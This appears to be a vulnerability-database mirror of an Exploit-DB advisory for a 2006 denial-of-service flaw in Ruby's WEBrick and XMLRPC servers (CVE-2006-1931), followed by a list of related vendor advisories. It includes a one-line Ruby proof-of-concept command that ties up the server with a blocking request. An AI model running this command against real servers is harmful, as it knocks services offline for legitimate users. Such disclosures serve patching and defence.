Lucene search
Tanaka AkiraEDB-ID:27723HistoryApr 21, 2006 - 12:00 a.m.
Yukihiro Matsumoto Ruby 1.x - XMLRPC Server Denial of Service
2006-04-2100:00:00
Tanaka Akira
www.exploit-db.com
15
AI Score
7.4
Confidence
Low
source: https://www.securityfocus.com/bid/17645/info
Ruby is affected by a denial-of-service vulnerability in the WEBrick HTTP server. This issue is due to the use of blocking network operations. Ruby's implementation of XML/RPC is also affected, since it uses the vulnerable WEBrick server.
This issue allows remote attackers to cause affected webservers to fail to respond to further legitimate requests.
Ruby versions prior to 1.8.3 are affected by this issue.
The following Ruby command will issue a request sufficient to trigger this issue:
ruby -rsocket -e 'TCPSocket.open("www.example.com", 10080) {|s|
s.print "GET /z HTTP/1.0\r\n\r\n"
sleep
}'Related
centos
centos
irb, ruby security update
2006-05-09 13:14:56
nvd
nvd
CVE-2006-1931
2006-04-20 21:02:00
gentoo
gentoo
Ruby: Denial of service
2006-05-10 00:00:00
nessus
nessus
RHEL 4 : ruby (RHSA-2006:0427)
2006-05-13 00:00:00
Ubuntu 4.10 / 5.04 / 5.10 : ruby1.8 vulnerability (USN-273-1)
2006-04-26 00:00:00
CentOS 4 : ruby (CESA-2006:0427)
2006-07-05 00:00:00
openvas
openvas
Gentoo Security Advisory GLSA 200605-11 (ruby)
2008-09-24 00:00:00
Gentoo Security Advisory GLSA 200605-11 (ruby)
2008-09-24 00:00:00
Debian Security Advisory DSA 1157-1 (ruby1.8)
2008-01-17 00:00:00
redhat
redhat
(RHSA-2006:0427) ruby security update
2006-05-09 00:00:00
ubuntucve
ubuntucve
CVE-2006-1931
2006-04-20 00:00:00
ubuntu
ubuntu
Ruby vulnerability
2006-04-24 00:00:00
prion
prion
Design/Logic Flaw
2006-04-20 21:02:00
cvelist
cvelist
CVE-2006-1931
2006-04-20 21:00:00
cve
cve
CVE-2006-1931
2006-04-20 21:02:00
osv
osv
ruby1.8
2006-08-27 00:00:00
debian
debian
[SECURITY] [DSA 1157-1] New ruby1.8 packages fix several vulnerabilities
2006-08-27 19:51:21